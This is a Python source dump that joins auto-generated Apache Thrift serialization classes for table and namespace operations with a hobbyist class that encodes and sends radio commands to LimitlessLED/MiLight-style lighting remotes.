(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype203, _size200) = iprot.readListBegin()
for _i204 in xrange(_size200):
_elem205 = TableSplit()
_elem205.read(iprot)
self.success.append(_elem205)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_table_splits_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter206 in self.success:
iter206.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class drop_namespace_args:
"""
Attributes:
- ns
- if_exists
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'ns', None, None, ), # 1
(2, TType.BOOL, 'if_exists', None, True, ), # 2
)
def __init__(self, ns=None, if_exists=thrift_spec[2][4],):
self.ns = ns
self.if_exists = if_exists
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ns = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BOOL:
self.if_exists = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('drop_namespace_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.STRING, 1)
oprot.writeString(self.ns)
oprot.writeFieldEnd()
if self.if_exists != None:
oprot.writeFieldBegin('if_exists', TType.BOOL, 2)
oprot.writeBool(self.if_exists)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class drop_namespace_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('drop_namespace_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rename_table_args:
"""
Attributes:
- ns
- name
- new_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRING, 'new_name', None, None, ), # 3
)
def __init__(self, ns=None, name=None, new_name=None,):
self.ns = ns
self.name = name
self.new_name = new_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.new_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rename_table_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.name != None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.new_name != None:
oprot.writeFieldBegin('new_name', TType.STRING, 3)
oprot.writeString(self.new_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rename_table_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rename_table_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class drop_table_args:
"""
Attributes:
- ns
- name
- if_exists
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.BOOL, 'if_exists', None, True, ), # 3
)
def __init__(self, ns=None, name=None, if_exists=thrift_spec[3][4],):
self.ns = ns
self.name = name
self.if_exists = if_exists
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.if_exists = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('drop_table_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.name != None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.if_exists != None:
oprot.writeFieldBegin('if_exists', TType.BOOL, 3)
oprot.writeBool(self.if_exists)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class drop_table_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('drop_table_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| StarcoderdataPython |
1975676 | <gh_stars>0
#! /usr/bin/env python3
import random
import time
class Remote:
_remote_type_alias_map = {
'fut089': 'rgbcct'
}
_remote_type_parameters_map = {
'rgbw': {
'retries': 10,
'delay': 0.1,
'channels': [9, 40, 71],
'syncword': [0x258B, 0x147A],
'zones': [1, 2, 3, 4],
'features': [
'can_set_brightness',
'has_brightness',
'has_white',
'has_night',
'has_color'
],
'brightness_range': [0, 25],
'button_map': {
'slider': 0x00,
'on': 0x01,
'white': 0x11,
'off': 0x02,
'night': 0x12,
'zone_on:1': 0x03,
'zone_on:2': 0x05,
'zone_on:3': 0x07,
'zone_on:4': 0x09,
'zone_white:1': 0x13,
'zone_white:2': 0x15,
'zone_white:3': 0x17,
'zone_white:4': 0x19,
'zone_off:1': 0x04,
'zone_off:2': 0x06,
'zone_off:3': 0x08,
'zone_off:4': 0x0A,
'zone_night:1': 0x14,
'zone_night:2': 0x16,
'zone_night:3': 0x18,
'zone_night:4': 0x1A,
'speed_up': 0x0B,
'speed_down': 0x0C,
'change_color_mode': 0x0D,
'zone_set_brightness': 0x0E,
'zone_set_color': 0x0F
}
},
'cct': {
'retries': 3,
'delay': 0.11,
'channels': [4, 39, 74],
'syncword': [0x55AA, 0x050A],
'brightness_range': [0, 9],
'temperature_output_range': [0, 9],
'temperature_input_range': [6500, 3000],
'zones': [1, 2, 3, 4],
'features': [
'has_max_brightness',
'has_brightness',
'has_temperature',
'has_night',
'is_white'
],
'button_map': {
'on': 0x05,
'off': 0x09,
'max': 0x15,
'night': 0x19,
'zone_on:1': 0x08,
'zone_on:2': 0x0D,
'zone_on:3': 0x07,
'zone_on:4': 0x02,
'zone_max:1': 0x18,
'zone_max:2': 0x1D,
'zone_max:3': 0x17,
'zone_max:4': 0x12,
'zone_off:1': 0x0B,
'zone_off:2': 0x03,
'zone_off:3': 0x0A,
'zone_off:4': 0x06,
'zone_night:1': 0x1B,
'zone_night:2': 0x13,
'zone_night:3': 0x1A,
'zone_night:4': 0x16,
'brightness_up': 0x0C,
'brightness_down': 0x04,
'temperature_up': 0x0E,
'temperature_down': 0x0F
}
},
'lyh_cct': {
'retries': 70,
'delay': 0.2,
'channels': [24],
'syncword': [0x6F67, 0xA118],
'message_length': 13,
'format_config': {
'crc_enabled': 0,
'packet_length_encoded': 0,
'auto_ack': 1,
'auto_term_tx': 0
},
'brightness_range': [0, 9],
'temperature_output_range': [0, 9],
'temperature_input_range': [6500, 3000],
'zones': [1, 2, 3],
'features': [
'has_brightness',
'has_temperature',
'is_white'
],
'button_map': {
'on': 0x05,
'off': 0x09,
'max': 0x15,
'night': 0x19,
'zone_on:1': 0x08,
'zone_on:2': 0x0D,
'zone_on:3': 0x07,
'zone_on:4': 0x02,
'zone_max:1': 0x18,
'zone_max:2': 0x1D,
'zone_max:3': 0x17,
'zone_max:4': 0x12,
'zone_off:1': 0x0B,
'zone_off:2': 0x03,
'zone_off:3': 0x0A,
'zone_off:4': 0x06,
'zone_night:1': 0x1B,
'zone_night:2': 0x13,
'zone_night:3': 0x1A,
'zone_night:4': 0x16,
'brightness_up': 0x0C,
'brightness_down': 0x04,
'temperature_up': 0x0E,
'temperature_down': 0x0F
}
}
}
_remote_type_parameters_map_unimplemented = {
'rgbcct': {
'channels': [8, 39, 70],
'syncword': [0x1809, 0x7236]
},
'rgb': {
'channels': [3, 38, 73],
'syncword': [0xBCCD, 0x9AAB]
},
'fut020': {
'channels': [6, 41, 76],
'syncword': [0xAA55, 0x50A0]
}
}
def __init__(self, radio, remote_type, remote_id, message_id = None, config = None):
# Pull in the config for this remote type
self._config = self._get_type_parameters(remote_type)
self._config['radio_queue'] = '__DEFAULT__'
# Allow the user to specify some more parameters
if config is not None:
self._config.update(config)
# Store parameters
self._radio = radio
self._type = remote_type
self._id = remote_id
# Initialize the message ID for this remote
if message_id is None:
self._message_id = random.randint(0, 255)
else:
self._message_id = message_id
return None
def _scale_int(self, input_value, input_range_low, input_range_high, output_range_low, output_range_high):
input_range = input_range_high - input_range_low
output_range = output_range_high - output_range_low
input_value = input_value - input_range_low
output = input_value * (output_range / input_range)
output = output + output_range_low
output = int(output + 0.5)
return output
def _debug(self, message):
if 'debug_log_command' in self._config:
self._config['debug_log_command'](message)
return None
def _get_type_parameters(self, remote_type):
config = {}
config.update(self._remote_type_parameters_map[remote_type])
# Supply default config values
if 'retries' not in config:
config['retries'] = 3
if 'delay' not in config:
config['delay'] = 0.1
setattr(self, '_compute_button_message', getattr(self, '_compute_button_message_' + remote_type))
setattr(self, '_parse_button_message', getattr(self, '_parse_button_message_' + remote_type))
setattr(self, 'pair', getattr(self, '_pair_' + remote_type))
setattr(self, 'unpair', getattr(self, '_unpair_' + remote_type))
return config
def _compute_button_and_zone_from_button_id(self, button_id):
button_info = {}
button_info['button'] = 'unknown=' + str(button_id)
for button_name, button_value in self._config['button_map'].items():
if button_value == button_id:
button_info['button'] = button_name
break
# If the button name has a zone, split it out into its own parameter
if button_info['button'].find(':') != -1:
button_name_zone = button_info['button'].split(':')
button_info['button'] = button_name_zone[0]
button_info['zone'] = int(button_name_zone[1])
return button_info
def _compute_button_message_lyh_cct(self, button_info):
# XXX: This protocol has not been completely reversed yet
if 'zone' in button_info:
if button_info['zone'] is None:
del button_info['zone']
message_id = button_info['message_id']
retval = None
if button_info['button'] == 'on' and 'zone' not in button_info:
if 'zone' not in button_info:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x66, 0x01, 0x59, 0xad, 0x07]
elif button_info['zone'] == 1:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0xb1, 0x68, 0x00, 0x67, 0x01, 0xd3, 0xff, 0x46]
elif button_info['zone'] == 2:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0x31, 0x69, 0x80, 0x67, 0x01, 0xd4, 0xc8, 0x11]
elif button_info['zone'] == 3:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0x31, 0x6a, 0x00, 0x68, 0x81, 0x55, 0xe0, 0x72]
if button_info['button'] == 'off':
if 'zone' not in button_info:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x66, 0x01, 0xd2, 0xf6, 0x46]
elif button_info['zone'] == 1:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0xb1, 0x68, 0x80, 0x68, 0x01, 0x4d, 0x4f, 0x0a]
elif button_info['zone'] == 2:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0x31, 0x69, 0x00, 0x69, 0x01, 0x4e, 0x80, 0x41]
elif button_info['zone'] == 3:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0x31, 0x6a, 0x80, 0x69, 0x81, 0xcf, 0x6f, 0x68]
if button_info['button'] == 'brightness_up':
if message_id % 2 == 0:
retval = [0x05, 0xb3, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x39, 0x81, 0xa7, 0x33, 0x7e]
else:
retval = [0x05, 0xb3, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x3c, 0x81, 0x2a, 0x63, 0x18]
if button_info['button'] == 'brightness_down':
if message_id % 2 == 0:
retval = [0x85, 0xb2, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x3d, 0x01, 0x2b, 0xc6, 0x61]
else:
retval = [0x85, 0xb2, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x45, 0x01, 0xb3, 0x1d, 0x3f]
if button_info['button'] == 'temperature_up':
if message_id % 2 == 0:
retval = [0x85, 0xb4, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x4b, 0x01, 0xbb, 0x9c, 0x4b]
else:
retval = [0x85, 0xb4, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x4e, 0x81, 0x3e, 0x26, 0x00]
if button_info['button'] == 'temperature_down':
if message_id % 2 == 0:
retval = [0x05, 0xb5, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x46, 0x01, 0x37, 0xd5, 0x69]
else:
retval = [0x05, 0xb5, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x4a, 0x01, 0x3b, 0x1a, 0x06]
if button_info['button'] == 'max':
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x66, 0x81, 0xd9, 0x07, 0x22]
if retval is None:
self._debug("Unsupported button: {}".format(button_info))
return None
# XXX: This probably breaks the CRC :-(
if 'zone' in button_info:
retval[6] = (retval[6] & 0xf0) | (0x07 + button_info['zone'])
else:
retval[6] = (retval[6] & 0xf0) | 0x0f
retval.append(0x00)
retval.append(0x0F)
return retval
def _parse_button_message_lyh_cct(self, button_message):
return {'raw': button_message}
return None
def _pair_lyh_cct(self, zone):
# XXX
return None
def _unpair_lyh_cct(self, zone):
# XXX
return None
def _compute_button_message_cct(self, button_info):
remote_id = button_info['remote_id']
message_id = button_info['message_id']
# Header consists of magic (0x5A), follow by 16-bit remote ID
header = [0x5A, (remote_id >> 8) & 0xff, remote_id & 0xff]
# Determine zone, default to all
zone = button_info.get('zone', 0)
# Some buttons need to be converted to zones
button_name = button_info['button']
if button_name in ['zone_on', 'zone_off', 'zone_max', 'zone_night']:
button_name = "{}:{}".format(button_name, zone)
# Look up the button
button_id = self._config['button_map'][button_name]
# Compute message body
body = [zone, button_id, message_id]
# Compute the whole message so far
message = header + body
# Compute message trailer
## Include a CRC, for good measure
crc = len(message) + 1
for byte in message:
crc = crc + byte
crc = crc & 0xff
trailer = [crc]
message = message + trailer
return message
def _parse_button_message_cct(self, button_message):
button_info = {}
# Verify the header -- if it is not valid, return None
if button_message[0] != 0x5A:
return None
# Parse out common parts of the message
button_info['remote_id'] = (button_message[1] << 8) | button_message[2]
button_info['zone'] = button_message[3]
button_info['message_id'] = button_message[5]
# Remove the all zone
if button_info['zone'] == 0:
del button_info['zone']
# Map the button ID to a button name
button_id = button_message[4]
button_info.update(self._compute_button_and_zone_from_button_id(button_id))
return button_info
def _pair_cct(self, zone):
self._send_button({
'button': 'zone_on',
'zone': zone
})
# Ensure that the "on" button cannot be hit soon after
# because it might trigger the unpair flow
time.sleep(5)
return True
def _unpair_cct(self, zone):
for retry in range(7):
self._send_button({
'button': 'zone_on',
'zone': zone
})
return True
def _compute_button_message_rgbw(self, button_info):
remote_id = button_info['remote_id']
message_id = button_info['message_id']
# Allow setting color for all zones
if button_info['button'] == 'set_color':
button_info['button'] = 'zone_set_color'
if 'zone' in button_info:
del button_info['zone']
# Allow setting brightness for all zones
if button_info['button'] == 'set_brightness':
button_info['button'] = 'zone_set_brightness'
if 'zone' in button_info:
del button_info['zone']
# Header consists of magic (0xB0), follow by 16-bit remote ID
header = [0xB0, (remote_id >> 8) & 0xff, remote_id & 0xff]
# Default value for most buttons, since they do not need it
brightness = 0
color = 0
# Some buttons need to be converted to zones
button_name = button_info['button']
if button_name in ['zone_on', 'zone_off', 'zone_white', 'zone_night']:
button_name = button_name + ':' + str(button_info['zone'])
button_id = self._config['button_map'][button_name]
# Brightness and Color buttons should also set the appropriate
# parameters
if button_info['button'] == 'zone_set_brightness':
## Brightness is a range of [0..25] (26 steps)
## Shifted 3 bitsleft
brightness = button_info['brightness']
if brightness < 0:
brightness = 0
elif brightness > 25:
brightness = 25
brightness = 31 - ((brightness + 15) % 32)
brightness = brightness << 3
elif button_info['button'] == 'zone_set_color':
color = button_info['color']
# The zone number is also encoded into the brightness byte
if 'zone' not in button_info:
zone_value = 0
else:
zone_value = button_info['zone']
brightness |= zone_value & 0b111
# Compute message
body = [color, brightness, button_id, message_id]
# Compute whole message
message = header + body
return message
def _parse_button_message_rgbw(self, button_message):
button_info = {}
# Verify the header -- if it is not valid, return None
if button_message[0] != 0xB0:
return None
# Parse out common parts of the message
button_info['remote_id'] = (button_message[1] << 8) | button_message[2]
button_info['color'] = button_message[3]
button_info['brightness'] = button_message[4]
button_info['message_id'] = button_message[6]
# Map the button ID to a button name
button_id = button_message[5]
button_info.update(self._compute_button_and_zone_from_button_id(button_id))
if button_info['button'] == 'zone_set_brightness':
brightness = button_info['brightness']
zone = brightness & 0b111
if zone != 0:
button_info['zone'] = zone
else:
button_info['button'] = 'set_brightness'
# Compute brightness value, there are 26 brightness steps, [16, 0][31, 23]
brightness = brightness >> 3
brightness = 31 - ((brightness + 15) % 32)
button_info['brightness'] = brightness
return button_info
def _pair_rgbw(self, zone):
self._send_button({
'button': 'zone_on',
'zone': zone
})
return False
def _unpair_rgbw(self, zone):
self._send_button({
'button': 'zone_on',
'zone': zone
})
self._send_button({
'button': 'zone_white',
'zone': zone
})
return False
def _get_next_message_id(self):
# Determine next message ID
self._message_id = (self._message_id + 1) & 0xff
return self._message_id
def _send_button(self, button_info, post_delay = None):
# Include the remote ID unless one was supplied
button_info = button_info.copy()
if 'remote_id' not in button_info:
button_info['remote_id'] = self._id
# Get the next message ID for this remote
if 'message_id' not in button_info:
message_id = self._get_next_message_id()
button_info['message_id'] = message_id
else:
self._message_id = button_info['message_id']
# Compute message
message = self._compute_button_message(button_info)
# Transmit
if 'delay' in button_info:
delay = button_info['delay']
else:
delay = self._config['delay']
if 'retries' in button_info:
retries = button_info['retries']
else:
retries = self._config['retries']
format_config = self._config.get('format_config', None)
if post_delay is not None:
delay = post_delay
self._debug("Sending {}={} n={} times with a {}s delay to queue {}, format = {}".format(button_info, message, retries, delay, self._config['radio_queue'], format_config))
self._radio.multi_transmit(message, self._config['channels'], retries, delay, syncword = self._config['syncword'], submit_queue = self._config['radio_queue'], format_config = format_config)
return True
def _set_brightness(self, brightness, zone = None, transition = None):
if transition is not None:
self._debug('Tranisition not supported for SET-type bulbs (yet)')
if zone is None:
message = {'button': 'set_brightness'}
else:
message = {
'button': 'zone_set_brightness',
'zone': zone
}
message['brightness'] = brightness
return self._send_button(message)
def _step_value(self, target_value, target_range_min, target_range_max, button_prefix, zone, midpoint = None, transition = None):
# Step all the way to the nearest extreme before moving it to
# where it should be
target_range = target_range_max - target_range_min + 1
if midpoint is None:
midpoint = (target_range / 2) + target_range_min
# Move to the "initial" value where we force the value
# to the extreme, then move it to its final value
initial_steps = target_range
if target_value < midpoint:
initial_direction = 'down'
final_direction = 'up'
initial_value = target_range_min
else:
initial_direction = 'up'
final_direction = 'down'
initial_value = target_range_max
# If this remote has a "max" feature, use that instead of stepping
use_max_button = False
if initial_value == target_range_max:
if 'has_max_{}'.format(button_prefix) in self._config['features']:
use_max_button = True
if use_max_button:
self._debug("[INITIAL] Going to max {}".format(button_prefix))
getattr(self, "_max_{}".format(button_prefix))(zone)
else:
# Otherwise, step it
step_command = {'button': "{}_{}".format(button_prefix, initial_direction)}
if zone is not None:
step_command['zone'] = zone
for step in range(initial_steps):
self._debug("[INITIAL] Stepping {} {}".format(button_prefix, initial_direction))
self._send_button(step_command)
# Now that we have forced the value to the extreme, move in
# steps from that value to the desired value
if initial_value < target_value:
final_steps = target_value - initial_value
else:
final_steps = initial_value - target_value
step_command = {'button': "{}_{}".format(button_prefix, final_direction)}
if zone is not None:
step_command['zone'] = zone
transition_delay = None
if transition is not None and final_steps > 1:
transition_delay = transition / (final_steps - 1)
for step in range(final_steps):
if step == (final_steps - 1):
transition_delay = None
self._debug("[FINAL] Stepping {} {} with a delay of {} (ms) afterwards".format(button_prefix, final_direction, transition_delay))
self._send_button(step_command, post_delay = transition_delay)
return True
def _step_brightness(self, brightness, brightness_min, brightness_max, zone = None, transition = None):
# For setting the brightness, set a change-overpoint at around
# 75%, where below this value we will go to the dimmest and
# step up and above this point it will go to the brightest
# and step down. This is to avoid getting bright then dimming
# which is much more jarring than getting dim and brightening.
if transition is None:
brightness_changeover = ((brightness_max - brightness_min) * 0.75) + brightness_min
else:
brightness_changeover = brightness_max * 2
return self._step_value(brightness, brightness_min, brightness_max, 'brightness', zone, midpoint = brightness_changeover, transition = transition)
def _step_temperature(self, temperature, temperature_min, temperature_max, zone = None):
return self._step_value(temperature, temperature_min, temperature_max, 'temperature', zone)
def _max_brightness(self, zone = None):
if zone is None:
message = {'button': 'max'}
else:
message = {
'button': 'zone_max',
'zone': zone
}
return self._send_button(message)
def _rgb_to_hue(self, r, g, b):
r = r / 255.0
g = g / 255.0
b = b / 255.0
cmax = max(r, max(g, b))
cmin = min(r, min(g, b))
diff = cmax - cmin
if cmax == cmin:
h = 0
elif cmax == r:
h = (60 * ((g - b) / diff) + 360) % 360
elif cmax == g:
h = (60 * ((b - r) / diff) + 120) % 360
elif cmax == b:
h = (60 * ((r - g) / diff) + 240) % 360
return h
def _rgb_to_color(self, rgb):
r = (rgb >> 16) & 0xff
g = (rgb >> 8) & 0xff
b = rgb & 0xff
# If the value is really a shade of white
# encode the brightness as a negative value
# where 0 is -1, 1 is -2, etc
if r == g and g == b:
return (r * -1) - 1
# Compute the hue of the RGB value (ignore
# luminance and saturation)
h = self._rgb_to_hue(r, g, b)
# Convert the hue into a LimitlessLED value
# which is really just the position along the
# color strip, offset
color = ((h / 360.0) * 255.0) + 26
color = color % 256
color = int(color + 0.5)
self._debug("RGB = \x1b[38;2;%i;%i;%im%06x\x1b[0m; Hue = %s; Color = %i" % (r, g, b, rgb, str(h * 360), color))
return color
def raw_send_button(self, button_info):
return self._send_button(button_info)
def raw_read_button(self):
channel = self._config['channels'][0]
self._radio.set_syncword(self._config['syncword'], submit_queue = None)
self._radio.start_listening(channel)
# Some protocols are not length encoded, specify the length instead
length = self._config.get('message_length', None)
format_config = self._config.get('format_config', None)
data = self._radio.receive(channel = channel, wait = True, wait_time = 0.1, length = length, format_config = format_config)
message = self._parse_button_message(data)
return message
def set_brightness(self, brightness, zone = None, transition = None):
if 'has_brightness' not in self._config['features']:
return False
if brightness < 0 or brightness > 255:
return False
